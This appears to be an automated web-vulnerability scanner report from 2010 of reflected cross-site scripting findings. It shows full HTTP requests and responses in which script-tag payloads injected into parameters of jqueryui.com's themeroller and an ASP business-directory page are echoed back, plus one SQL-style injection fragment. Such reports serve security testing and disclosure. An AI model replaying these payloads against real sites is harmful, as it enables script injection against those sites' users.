GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px8c51e"><script>alert(1)</script>866f1ad0c97&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a567e"><script>alert(1)</script>8e28c85fa0f was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50a567e"><script>alert(1)</script>8e28c85fa0f&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a79c3"><script>alert(1)</script>0133da4d252 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20a79c3"><script>alert(1)</script>0133da4d252&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5231d"><script>alert(1)</script>6c1b949ca33 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px5231d"><script>alert(1)</script>6c1b949ca33&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the AdTagCountyId request parameter is copied into the HTML document as plain text between tags. The payload e67b1<script>alert(1)</script>cfb38d751f7a43364 was submitted in the AdTagCountyId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the AdTagCountyId request parameter is copied into the HTML document as plain text between tags. The payload 5ef5f<script>alert(1)</script>891192eefff was submitted in the AdTagCountyId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
AdTagCountyId=1 AND 'NS='ss5ef5f<script>alert(1)</script>891192eefff&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2 ...[SNIP]...
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private
<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss5ef5f<script>alert(1)</script>891192eefff&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c ...[SNIP]...
The value of the AdTagPriceIndx request parameter is copied into the HTML document as plain text between tags. The payload bed0b<script>alert(1)</script>88d4418c010 was submitted in the AdTagPriceIndx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3bed0b<script>alert(1)</script>88d4418c010&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80 ...[SNIP]...
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private
<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3bed0b<script>alert(1)</script>88d4418c010&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80- ...[SNIP]...
The value of the AdTagPriceIndx request parameter is copied into the HTML document as plain text between tags. The payload d0174<script>alert(1)</script>5d9aae33f2e8c9585 was submitted in the AdTagPriceIndx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the Amenities request parameter is copied into the HTML document as plain text between tags. The payload 6b529<script>alert(1)</script>2d5124fe105042a4 was submitted in the Amenities parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the Amenities request parameter is copied into the HTML document as plain text between tags. The payload af9ff<script>alert(1)</script>55718c59716 was submitted in the Amenities parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3af9ff<script>alert(1)</script>55718c59716&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c ...[SNIP]...
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private
<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3af9ff<script>alert(1)</script>55718c59716&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c8 ...[SNIP]...
The value of the CategoryId request parameter is copied into the HTML document as plain text between tags. The payload 4860b<script>alert(1)</script>626b282daaf was submitted in the CategoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR4860b<script>alert(1)</script>626b282daaf&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N ...[SNIP]...
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private
<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR4860b<script>alert(1)</script>626b282daaf&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1 ...[SNIP]...
The value of the CategoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a59"><script>alert(1)</script>e4b9c9d10edc54c92 was submitted in the CategoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR17a59"><script>alert(1)</script>e4b9c9d10edc54c92&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784